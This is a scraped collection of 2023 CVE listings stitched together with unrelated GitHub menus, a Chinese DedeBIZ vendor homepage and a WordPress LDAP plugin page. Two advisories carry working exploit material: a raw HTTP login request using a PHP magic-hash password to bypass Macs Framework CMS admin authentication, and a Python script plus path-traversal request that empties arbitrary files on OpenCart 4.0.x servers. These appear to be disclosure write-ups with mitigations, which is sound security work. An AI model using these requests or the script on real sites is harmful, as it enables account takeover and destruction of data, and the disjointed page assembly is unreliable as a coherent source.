SeaCMS V12.9 was discovered to contain an arbitrary file write vulnerability via the component admin_notify.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-44169: vulnerabilities/SeaCMS V12.9 Arbitrary file write vulnerability.pdf at main · H3ppo/vulnerabilities

SeaCMS v12.8 has an arbitrary code writing vulnerability in the /jxz7g2/admin_ping.php file.

CVE-2023-43222

A stored cross-site scripting (XSS) vulnerability in /settings/index.php of Black Cat CMS 1.4.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website footer parameter.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

Gi0rgi0R / **xss\_installation\_blackcat\_cms\_1.4.1** Public

*   Notifications
*   Fork 0
*   Star 0
    

XSS in install page in BlackCat CMS 1.4.1

0 stars 0 forks Activity

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Git stats**

*   **6** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

README.md

Update README.md

September 22, 2023 19:17

XSS in BlackCat CMS install page POC

**README.md**

**XSS in BlackCat CMS install page**

Software link: BlackCat CMS \[https://blackcat-cms.org/\]

Version: 1.4.1

@author: Jorge Riopedre

Description: BlackCat CMS 1.4.1 is affected by a Cross-site scripting (XSS) vulnerability in upload/install/index.php that allows remote attackers to inject arbitrary web script or HTML via the 'Website Title' parameter.

**POC**

When performing the installation and entering the site settings to install the appliance, the 'Website title' field is affected by the injection of arbitrary code:

**About**

XSS in install page in BlackCat CMS 1.4.1

**Resources**

Readme

Activity

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published

CVE-2023-44043: GitHub - Gi0rgi0R/xss_installation_blackcat_cms_1.4.1: XSS in install page in BlackCat CMS 1.4.1

Super Store Finder v3.6 and below was discovered to contain a SQL injection vulnerability via the Search parameter at /admin/stores.php.

CVE-2023-44044: Superstore-sql-poc/SQL at main · TishaManandhar/Superstore-sql-poc

A stored cross-site scripting (XSS) vulnerability in /settings/index.php of Black Cat CMS 1.4.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website header parameter.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-44042: GitHub - Gi0rgi0R/xss_frontend_settings_blackcat_cms_1.4.1: XSS in frontend settings in BlackCat CMS 1.4.1

A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.

CVE-2023-43187: CVE/CVE-2023-43187 at main · jagat-singh-chaudhary/CVE

DedeBIZ v6.2.11 was discovered to contain multiple remote code execution (RCE) vulnerabilities at /admin/file_manage_control.php via the $activepath and $filename parameters.

*   首页
*   下载
*   文档
*   商业支持
*   贡献者
*   服务
*   代码托管
*   联系我们

**免费商用，快速搭建企业、博客、商城开源站点**

DedeBIZ系统基于PHP7版本开发，具有很强的可扩展性，并且采用GPLv2协议完全开放源代码。DedeBIZ支持采用现流行的Go语言设计开发，拥有简单易用、灵活扩展特性之外更安全、高效。模板设计制作简单，一直是系统一大特点，延续之前标签，同时采用响应式模板引擎Bootstrap作为系统模板渲染引擎，让搭建跨终端和移动端全媒体站点更简单。

推荐环境：Nginx+PHP8.X+MySQL5.X 最新版本：6.2.12（2023-09-28） 下载程序

**下载程序**

我们需要先准备程序需要的运行环境，然后通过下载软件安装包或者通过源代码检出的方式来实现搭建系统。

前往下载

**技术服务**

DedeBIZ作为全新品牌，长达十年的技术沉淀作为您的技术补充，将为您带来安全、专业、可信赖的服务体验，值得拥有！

了解更多

**商业服务**

感谢对DedeBIZ系统的支持，您的购买是对知识产权的支持与尊重，更是为中国建站系统走向世界贡献力量。

授权申请

**贡献者**

注册加入DedeBIZ贡献者，个人和组织能够共同参与官方全新开源生态建设，互利共赢。

加入团队

**官方团队**

**天涯**

精通GO、PHP语言，十年技术沉淀。

**老岳**

资深高级UI设计师，十年设计经验沉淀。

**织梦猫**

专门提供DedeBIZ模板下载的网站。

**织梦帮**

专门提供DedeBIZ模板下载的网站。

**动态资讯**

**V6.2.7登场：数据共享无忧，构建互联万物新生态**

 天涯 2023年5月18日

大家期盼已久的V6.2.7发布了，这次更新的重点是新增了跨站数据调用功能，让数据共享更加简单。我们还对用户中心功能进行了优化，使现有系统成为集内容、互动和支付于一体的综合性系统。

**缅怀DedeCMS创始人林学先生**

 天涯 2022年12月4日

2022年12月3日下午DedeCMS创始人林学先生（IT柏拉图）因罹患癌症逝世。林学先生生于1979年10月10日，于2004年8月编写的DedeCMS至今仍有数十万企业、个人站长使用

CVE-2023-43234: 穆云智能科技 - DedeBIZ管理系统 - 我们致力于管理系统开源提供动力

The Staff / Employee Business Directory for Active Directory plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 1.2.3. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.

*   Details
*   Reviews
*   Installation
*   Development

Showcase | Documentation | Features | Contact Us

The Staff/Employee Business Directory for Active Directory plugin is used to perform an LDAP search and display the Staff / Employees present in your Active Directory on a WordPress site using a shortcode. The users / staff / employee details will be fetched from the Active Directory dynamically. That means the users will not be created in WordPress, and neither will their information be stored. Our plugin will seamlessly allow you to perform a Staff / Employee search through your business directory, employee directory, staff directory, or any other Active Directory implementations from your WordPress site and display the information you would like to see.

**Free Version Features**

*   Search LDAP / Active Directory users and Display them on your WordPress site.
*   Fetch information from a business directory, employee directory, staff directory, or any other Active Directory implementations.
*   Display the LDAP / Active Directory users using the configured attributes such as name, email, phone, and custom attributes.
*   LDAP custom attributes such as Department, Title, Birthday, etc., can also be used to perform LDAP search.
*   Display Profile Picture set in your LDAP / Active Directory as user profile picture in LDAP search results.
*   Search using different LDAP Search Bases that allow you to restrict employee / staff search to selected Search Bases (Organizational Units).
*   Auto-fetching the list of LDAP Search Bases / Organization Units (OUs) in your LDAP / Active Directory.
*   Support for LDAP Secure connection (LDAPS) and TLS Connection.

Support searching and fetching data dynamically from the following Active Directory implementations:

1.  Microsoft Active Directory
2.  Azure Active Directory
3.  Sun Active Directory
4.  OpenLDAP Directory
5.  JumpCloud
6.  FreeIPA Directory
7.  Synology
8.  OpenDS  
    and several other LDAP directory systems.

**Premium Version Features (Check out the Licensing tab to know more):-**

*   **Add unlimited LDAP / AD Attributes:** Add and configure as many LDAP/Active Directory custom attributes to display on your WordPress site.
*   **Multiple Search Attributes:** Search the LDAP / AD staff / employees using more than one LDAP attribute at a time. For example, search from the LDAP Server/Active Directory for users by name and city attributes.
*   **Auto-fetching of LDAP Organizational Units (OUs):** Fetches the LDAP Organizational Units (OUs) present in your Active Directory/ Business Directory/ Employee Directory/ Staff Directory or other LDAP Directory.
*   **Search Users from Multiple LDAP Search Bases:** Select multiple search bases and search LDAP users from these configured search bases from your Active Directory / other LDAP Directory.
*   **Custom Search Filter:** Add a Custom Search Filter to customize the LDAP Employee search result as per the requirements. Ex. Search only active LDAP Directory users, and restrict particular LDAP/Active Directory group users in LDAP search results.
*   **Fetch LDAP/Active Directory Profile Picture:** Display the thumbnail photo / Profile Picture set in your LDAP/Active Directory as the user profile picture in the search result.

**Use Cases Supported By Our Plugin**

*   Create a Phonebook Directory / Employee Directory / Staff Directory that is in sync with your Active Directory.
*   Fetch the complete profile information along with pictures of students enrolled in a school or university.
*   Display hospital staff and doctors with the details of their specialization from your Active Directory / LDAP on a WordPress page.
*   Search and display the employees’ / staff’s data present in your LDAP server on-the-fly without storing the employee information in WordPress.
*   Display Staff / Employees having birthdays and anniversaries on a specific page and send automated congratulating emails.

**Other Use-Cases we support**

*   **miniOrange WP LDAP/AD Login for Intranet sites plugin** supports login to WordPress sites using credentials stored in Active Directory and LDAP Directory systems. Only if you have access to **LDAP Extension** on your site.
*   **miniOrange Active Directory/LDAP Integration for Cloud & Shared Hosting Platforms Plugin** supports login to WordPress sites hosted on a shared hosting platform using credentials stored in active directory and LDAP Directory systems in case you are not able to enable **LDAP Extension** on your site.
*   **WordPress Login and User Management Plugin**: This plugin offers several functionalities, including bulk user management, user redirection based on WordPress roles, user session management, auto-logout users, and the ability to make a page or post private or public based on an ID or URL.
*   miniOrange supports **API Security use cases** to protect and secure your APIs using our product **XecureAPI** which helps you to enable Authentication methods ( like OAuth, SAML, LDAP, API Key Authentication, JWT Authentication etc ), Rate Limiting, IP restriction and much more on your APIs for complete protection.
*   miniOrange also supports **VPN use cases** Log in to your VPN client using Active Directory /other LDAP Directory credentials and **Multi-Factor Authentication**.
*   miniOrange supports **Single-Sign-On (SSO)** into a plethora of applications and supports various protocols like(**RADIUS, SAML, OAuth, LDAP/LDAPS**, using various IDP’s like **Azure Active Directory, Microsoft On-Premise Active Directory, Octa, ADFS**, etc.
*   Contact us at info@xecurify.com to know more.

**Why you should go with our solution**

*   **Support**: With search being one of the essential functions of a website, our priority support ensures that any issues you face on a live production site can be resolved on time.
*   **Regular updates**: We regularly update our plugin and ensure it is compatible with the latest WordPress versions. These updates include security and bug fixes that **provide you have the newest security fixes**.
*   Ensure timely updates for **new WordPress/PHP releases** with our premium plugins and compatibility updates to ensure you have adequate support for smooth transitions to new versions of WordPress and PHP.
*   **Reasonable priced**: Various plans are tailored to suit your needs. We provide discounts to educational and non-profit organizations and bulk discounts on large purchases.
*   **Easy to set up** : High-quality, easy-to-understand documentation will help you in setting up our plugin. Our developers can also help you by walking you through the setup process of the plugin.
*   High level of **customization** and **add-ons** to support specific requirements.

**Need support?**

Please email us at ldapsupport@xecurify.com or Contact us

**Minimum Requirements**

*   Compatible with WordPress version 5.0 or higher
*   Compatible with PHP version 5.2.0 or higher

**Prerequisites**

I. Staff/Employee Business Directory for Active Directory plugin requires the following PHP Modules to be enabled. Make sure you have enabled them.

1.  **PHP LDAP Module**:  
    Step-1: Open the php.ini file.  
    Step-2: Search for “extension=php\_ldap.dll” in the php.ini file. Uncomment this line. If it isn’t present, add this line to the file and save the file.
    
2.  **OpenSSL Module**:  
    Step-1: Open the php.ini file.  
    Step-2: Search for “extension=php\_openssl.dll” in the php.ini file. Uncomment this line. If not present, add this line to the file and save the file.
    

II. To install the Staff / Employee Business Directory for Active Directory plugin, the minimum requirements are:

1.  **WordPress version 5.0**
2.  **PHP version 5.2.0**

**From your WordPress dashboard**

1.  Visit Plugins > Add New
2.  Search for Staff/Employee Business Directory for Active Directory. Find and install the Staff/Employee Business Directory for Active Directory.
3.  Activate the plugin from your Plugins section.

**From WordPress.org**

1.  Download the Staff/Employee Business Directory for Active Directory.
2.  Unzip and upload the miniorange-ldap-directory-search directory to your /wp-content/plugins/ directory.
3.  Activate the Staff/Employee Business Directory for Active Directory from your Plugins section.

Make sure that if there is a firewall, you OPEN THE FIREWALL to allow incoming requests to your LDAP from your WordPress Server IP and open port 389 (636 for SSL or LDAPS).

**Why am I getting an error while trying to Test LDAP Connection?**

1.  Please make sure that the LDAP Server URL, Username and Password that you have entered are correct.
2.  In the Username field, please enter either the UserPrincipalName or DistinguishedName (DN) attribute of any user present in your LDAP server.
3.  Check if the LDAP server URL is accessible from your hosted site and the port 389 is open. { To check this, run this command on your WordPress server: >telnet < LDAP server URL or IP >:389 }
4.  If you are using a firewall, open the firewall to allow incoming requests to your LDAP from your WordPress Server IP and port 389.

If you have any queries or if you need any sort of assistance configuring our plugin, you can contact us at ldapsupport@xecurify.com. Our customer support team is available 24×7 to assist you in any way possible.

**What is meant by Search Base in my LDAP environment?**

1.  Search Base is a container / path where your LDAP/AD users that you want to search are present.
2.  This is the container in which the Staff/Employee Business Directory For Active Directory Plugin will search for LDAP users.
3.  The Search Base value can be obtained from the distinguishedName attribute of a container / node where the LDAP/AD users are present.

For example, if you want to search all LDAP/AD users in the Organizational Unit (OU) named “LDAPUsers. The Search Base would be OU=LDAPUsers, DC=DomainName, DC=SubDomainName.  
If you have any queries or if you need any sort of assistance in configuring our plugin, you can contact us at ldapsupport@xecurify.com. Our customer support team is available 24×7 to assist you in any way possible.

**I can not add more LDAP user attributes in the Attributes Configuration. Why?**

To add and display unlimited LDAP user attributes, please upgrade your existing plan to the premium plan.

**Is it possible to display only active (non-disabled) users from the LDAP/AD Server?**

Yes, It is possible using the custom search Filter feature, which is present in the premium version of our plugin.

Click here to view our detailed FAQ page.

For support or troubleshooting help, please email us at info@xecurify.com or Contact us.

**How does the Custom Search Filter work?**

Custom LDAP search filters allow you to apply advanced filters to your search. You can restrict / allow specific users belonging to LDAP groups or Organizational Units. For Example, If you want to display users from Sales Department, then you can do this using the below search filter:

(&(objectClass=user)(objectCategory=person)(sAMAccountName=?)(department=’Sales’))

**Does this plugin store any staff / employee information in the WordPress database?**

No, this plugin does not store any LDAP user’s data in the WordPress database. Our Staff / Employee Business Directory For Active Directory plugin dynamically fetches and displays users’ information on the fly.

We are using Staff / Employee Business Directory plugin for showing our employees on WordPress page. The plugin displays our employees on pages based on departments they are linked to Active Directory. The most amazing thing was Support we received from miniOrange. I am using other WordPress plugins for years and I never recieved this kind of quality support that miniOrange has provided us. They have very trained employees for problem solving. I would like to thank Vikas More for his amazing knowledge and problem solving skills that leaded to achieve our requirements. He is very tallented and proficient in the conversation. If we need any plugin in the future, miniOrange will be our first choice because of the product quality and most important the quick and great support we have received from Vikas. Keep it up the good work minOrange!

Great plugin - works well and excellent support for any customozation. Very Responsive support as well.

What a great plugin with great support. Easy to configure and setup!!

Wonderful Plugin and works better as expected!!! The support is TOP!

The plugin is really easy to install and configure. It does exactly what you want it to do. The technical support especially Vikas is really professional and responsive. We had to translate some terms in French and it was done quickly. I can only recommend this plugin. Thanks you.

The support (especially Vikas) is just great. We had a problem and they were really flexible and helpful. Now our search-function works perfectly and we know we can always rely on the support.

Read all 9 reviews

“Staff / Employee Business Directory for Active Directory” is open source software. The following people have contributed to this plugin.

Contributors

*    miniorange

**1.3**

*   Enhanced security measures to prevent LDAP Passback Vulnerability.

**1.2.3**

*   Security Fixes

**1.2.2**

*   Compatibility with the WordPress version 6.3

**1.2.1**

*   Compatibility with the WordPress version 6.2

**1.2.0**

*   WP Guideline & Security Fixes.
*   Code Optimization.

**1.1.2**

*   Black Friday Sale Advertisement.
*   Updated Licensing Page.
*   Added Settings Menu.

**1.1.1**

*   Added Advertisement for Trialware.
*   Minor Bug Fixes.
*   Compatibility with WordPress 6.1

**1.1**

*   Read me changes.
*   UI Improvements.
*   Added an optional feedback form on plugin deactivation.
*   Code optimization

**1.0.1**

*   Read me changes.
*   Minor UI changes.

**1.0**

This is the first version of the plugin.

CVE-2023-4505: Staff / Employee Business Directory for Active Directory

In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.

**CVE-2023-43154 - Macs Framework v1.1.4f CMS Type Confusion Vulnerability****Table of Contents**

1.  Overview
2.  Proof of Concept
3.  Technical Debrief
4.  Mitigation

**Overview**

**CVE-ID**: CVE-2023-43154

**CVSS 3.1**: 9.8

**Vulnerability Description**: A loose comparison in the isValidLogin() function results in a PHP type confusion vulnerability that can be abused to bypass authentication and takeover the administrator account.

**Vulnerable Parameters**: The username and password of the users on the CMS.

**Affected Products**: Macs Framework v1.14f - Content Management System

**Limitations**:

1.  The username of the victim account must be previously known or a zero-like string
2.  The password used with the account must result in a "magic hash".

**User Interaction Required**: None

**References**: https://github.com/ally-petitt/CVE-2023-43154-PoC

**Discovery Date**: September 7, 2023

**Reported By**: Ally Petitt

**Proof of Concept**

Logging in at the URI /index.php/main/cms/login with the username of the victim account and any password that results in a magic hash will lead to authentication bypass.

A sample login is shown below.

**Send Payload**

    POST /index.php/main/cms/login HTTP/1.1
    Host: 172.17.0.2
    Content-Length: 62
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.17.0.2
    Referer: http://172.17.0.2/index.php/main/cms/login
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=di4ceqcv9432vcb0p27rkh7k82
    Connection: close
    
    ajaxRequest=true&&username=testadmin&password=0gdVIdSQL8Cm&scrollPosition=0
    

**HTTP Response**

    HTTP/1.1 200 OK
    Date: Sat, 09 Sep 2023 02:01:26 GMT
    Server: Apache/2.4.25 (Debian)
    X-Powered-By: PHP/5.6.40
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Length: 72
    Connection: close
    Content-Type: text/html; charset=ISO-8859-1
    
    <script>window.location.href="http://172.17.0.2/index.php/home"</script>
    

The status code of 200 and the redirect to /index.php/home are both indications that the login attempt was successful. The password of testadmin was not the password used in the login attempt (0gdVIdSQL8Cm). Instead, it was set to QNKCDZO.

**Technical Debrief**

When a user attempts to log in, their supplied password is hashed and and sent as a parameter to the isValidLogin() function via the initial login() function that is called when a POST request is made to /index.php/Main/CMS/login.

        public function login()
        {      
          if($this->isValidLogin(Post::getByKey('username'), $this->encrypt(Post::getByKey('password')) ) || ( $this->isAdminLoggedIn() ))
          --snip--
        }
    

The isValidLogin() function begins on line 83 of file /Application/plugins/CMS/controllers/CMS.php. It is vulnerable to a type confusion vulnerability due to its use of 2 equal signs instead of 3.

        private function isValidLogin($username, $password)
        {
          $this->loadModels();
          
          $loggedIn = false;
    
          foreach (Config::$editInPlaceAdmins as $key=>$account)
          {
            if(( $account['username'] == $username) && ($account['password'] == $password ) )
            {
              $loggedIn = true;
              Session::set('AdminLoggedIn', $account);
              break;
            }
          }
    

As shown in the if statement, the username and password are being checked with a loose comparison, leading to a PHP type confusion vulnerability. This can be abused when logging in with a password that results in a magic hash, or hash that is interpretted by PHP to have the value 0 during a loose comparison. A list of such passwords can be found here.

To exploit this, it is important to first understand the format that $account['password'] is stored in. In the function used to save a new user account on line 730 of the aforementioned CMS.php file, it becomes clear that the password is first passed through an encrypt function before it is stored.

      $password = $this->encrypt(Post::getByKey('password'));
      $confirmPassword = $this->encrypt(Post::getByKey('confirmPassword'));
      -- snip --
      private function saveNewUser( $username, $password, $emailAddress, $roleId)
    

Continuing to the function that is called after the password is run through encrypt, the following code is used:

        private function saveNewUser( $username, $password, $emailAddress, $roleId)
        {
          --snip--
                $this->usersModel->insertUser($username, $password, $emailAddress, $roleId);
          --snip--
        }
    

Based on the code above, it is apparent that the "encrypted" password was placed directly into the users Model of the MVC framework. Finally, to exploit this vulnerability, it is necessary to understand how the encrypt function works as its output is being directly compared against the user input.

        private function encrypt( $string )
        {      
          return md5($string);
        }
    

The encrypt function returns the MD5 hash of the string passed to it. This means that when the login() function is called with the user-supplied credentials, the inputted password is hashed and compared against the stored MD5 hash of the victim account.

The implication is that when using a password that results in a PHP collision, or magic hash, it will register as being equivilent when compared against a stored password that also follows the format of a magic hash. As a result, a very large number of passwords can be used to authenticate to and takeover the administrator account, even when the initial password is not previously known.

**Mitigation**

This vulnerability can be mitigated by changing the loose comparison in the isValidLogin() function to a strict comparison by replacing == with ===.

CVE-2023-43154: GitHub - ally-petitt/CVE-2023-43154-PoC: PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.

Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2 allows an authenticated user with access/modify privilege on the Log component to empty out arbitrary files on the server

**Summary:**

**Product**

OpenCart

**Vendor**

OpenCart

**Severity**

High - Adversaries may exploit software vulnerabilities to empty any file on the server with write permissions.

**Affected Versions**

4.0.0.0 - 4.0.2.2

**Tested Version(s)**

4.0.2.2

**CVE Identifier**

CVE-2023-2315

**CVE Description**

Path traversal in Opencart versions 4.0.0.0 to 4.0.2.2 allows authenticated backend users to empty any existing file on the server with write permissions.

**CWE Classification(s)**

CWE-27 - Path Traversal: ‘dir/../../filename’

**CAPEC Classification(s)**

CAPEC-126 - Path Traversal

**CVSS3.1 Scoring System:**

**Base Score:** 8.1 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

None

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Opencart is an open source ecommerce platform for online merchants to self-host and list their products for sale. It is structured in a way that allows for a quick setup and Opencart also provides a cloud solution for users who do not want to have an on-premise setup. Opencart is split into two fronts: a storefront containing a catalogue that regular users will access, as well as a backend administrative dashboard for management purposes. Account roles for the backend dashboard are highly customizable, allowing the owner of the website to initialise custom roles with different privileges and access, by using the fine-grained controls.

**Vulnerability Summary:**

There is a path traversal vulnerability at the Logs section of the backend dashboard, which allows an authenticated adversary to empty any existing file on the web server, given that there is write permissions on the file. By default, every OpenCart file is able to be emptied. This means that the availability of the website will be heavily impacted by emptying the core files, preventing regular functionality of the website. This vulnerability was introduced from versions 4.0.0.0 onward and patched in version 4.0.2.3.

**Vulnerability Details:**

A backend user with “access” and “modify” permissions on the “tool/log” setting is able to clear the logs of the website. When clearing the logs in a regular use case, a HTTP GET request is sent to delete the file “error.log”, by specifying it in the filename query parameter. The relevant code that is vulnerable can be found below:

    // /admin/controller/tool/log.php
    
    public function clear(): void {
    
        if (isset($this->request->get['filename'])) {
            $filename = (string)$this->request->get['filename']; // [1]
        } else {
            $filename = '';
        }
    
        $json = [];
    
        if (!$this->user->hasPermission('modify', 'tool/log')) {
            $json['error'] = $this->language->get('error_permission');
        }
    
        // DIR_LOGS = /system/storage/logs/
        $file = DIR_LOGS . $filename; // [2]
    
        if (!is_file($file)) {
            $json['error'] = sprintf($this->language->get('error_file'), $filename);
        }
    
        if (!$json) {
            $handle = fopen($file, 'w+'); // [3]
            fclose($handle);
            $json['success'] = $this->language->get('text_success');
        }
        // ...
    }
    

At [1], the filename is obtained from the incoming HTTP GET request and stored into the $filename PHP variable without any form of input sanitisation. At [2], the file name is appended to the back of the storage log path /system/storage/logs/ and stored into another variable $file. At [3], the $file variable is used in a fopen() function call with the mode set to w+. This means that the existing file will have its content emptied. Since a file existence check occurs before this, it is not possible to create files that do not already exist.

In a normal scenario, the file /system/storage/logs/error.log will be emptied after the GET request is sent. However, since there is a lack of input sanitisation, it is possible for the filename query parameter to contain any number of path traversal sequence (../) to traverse out of the intended directory and point to other files instead. This results in other files being emptied and permanently affecting the website’s functionality.

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has a set of valid credentials to the backend dashboard with access and modify permissions on tool/log.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that exploits the Path Traversal vulnerability.

The vulnerability can be exploited by sending a GET request to https://TARGET_HOST/admin/index.php?route=tool/log.clear&user_token=<USER_TOKEN>&filename=../../../../../../tmp/PoC.txt, for example:

    GET /admin/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token=4d6d604d8862798e96fe91846f28a36f HTTP/1.1
    Host: TARGET_HOST
    Cookie: OCSESSID=4f09deedf4a82f9c5b4bee9ec3;
    

Before running the exploit below, please ensure that you create a non-empty file /tmp/PoC.txt and that it has write permissions for the web user:

    $ echo "Hello" > /tmp/PoC.txt
    $ chmod 777 /tmp/PoC.txt 
    $ ls -la /tmp/PoC.txt
    -rwxrwxrwx 1 root root 6 Apr 26 09:36 /tmp/PoC.txt
    

Then, run the exploit below:

    # Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315)
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import re
    import requests
    import sys
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password
    
        print("\n======= Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315) =======")
        print("Please ensure that a file /tmp/PoC.txt with write permissions has been created on the target server with non-empty content!\n")
    
        if len(sys.argv) != 4:
            print("[!] Please enter the required arguments like so: python3 {} http://TARGET_URL/ADMIN_PATH/ USERNAME PASSWORD".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
    
    def authenticate():
        global user_token
    
        print("[+] Attempting to authenticate...")
    
        # Get login_token
        path = f"{target}/index.php"
        res = s.get(path)
        login_token = re.findall("login_token=(.+)\" method", res.text)[0]
        
        # Perform login and get user_token
        data = {
            "username": username,
            "password": password
        }
        path = f"{target}/index.php?route=common/login.login&login_token={login_token}"
        res = s.post(path, data=data)
        user_token = re.findall("user_token=(.+)\"", res.text)[0]
    
        if not user_token:
            print("[!] Failed to authenticate! Are the credentials correct?")
            sys.exit(1)
    
        print("[+] Authenticated successfully.")
    
    def delete():
    
        print("[+] Attempting to empty /tmp/PoC.txt...")
    
        # Empty /tmp/PoC.txt
        path = f"{target}/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token={user_token}"
        res = s.get(path)
        print(f"[+] Output: {res.text}")
    
    def main():
        check_args()
        authenticate()
        delete()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

OpenCart released version 4.0.2.3 that patches this vulnerability. It is recommended to upgrade to the latest version of OpenCart.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the server’s access logs for all GET requests made to /admin/index.php?route=tool/log.clear, and filtering for requests that contain ../ in the filename query parameter.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2022-09-06 Followed the security bug reporting instructions and created an OpenCart forum account to try to report to the administrators, but new accounts are unable to send private messages.
*   2022-09-11 Email sent to [email protected] in an attempt to establish a proper communication channel with the project owner/maintainers.
*   2022-09-12 Support agent replied and suggested to describe the issue in a public channel via their GitHub Issues tracker, to which we reminded that it is a security bug on the latest version. Support agent then requested to send them the report where they will forward it to the developers. We instead requested for the public key of the developers so that the report can be encrypted to prevent information leakage. Support agent replied “they do not have such”.
*   2022-09-14 Tried the “Contact Us” form on OpenCart’s website. Ended up with a second support ticket being opened.
*   2022-09-15 Opened a GitHub Issue (#12684) in a last resort to establish a proper communication channel with the developers. Issue closed immediately by the project owner, and **marked as spam**.
*   2022-09-15 Email sent directly to [email protected] as it is used for GitHub commits.
*   2022-09-15 Project owner replied and we sent the bug report over.
*   2022-09-15 Bug fixed in commit 0a8dd91
*   2023-09-16 New release version 4.0.2.3 containing the patch.
*   2023-09-18 Public Release

Tag

#php